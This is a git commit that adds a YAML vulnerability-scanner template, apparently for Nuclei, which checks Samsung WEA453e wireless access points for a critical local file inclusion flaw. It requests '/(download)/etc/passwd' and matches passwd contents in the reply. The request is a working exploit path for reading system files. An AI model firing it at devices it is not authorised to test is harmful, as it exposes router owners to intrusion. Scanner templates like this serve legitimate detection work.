Create samsung-wlan-ap-lfi.yaml

patch-1
PikPikcU 2021-02-15 04:30:32 +00:00 committed by GitHub
parent eb50c32a64
commit 9daed142be
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: samsung-wlan-ap-lfi
info:
name: Samsung Wlan AP (WEA453e) LFI
author: pikpikcu
severity: critical
reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
requests:
- method: GET
path:
- "{{BaseURL}}/(download)/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "bin:[x]:1:1"
part: body
- type: status
status:
- 200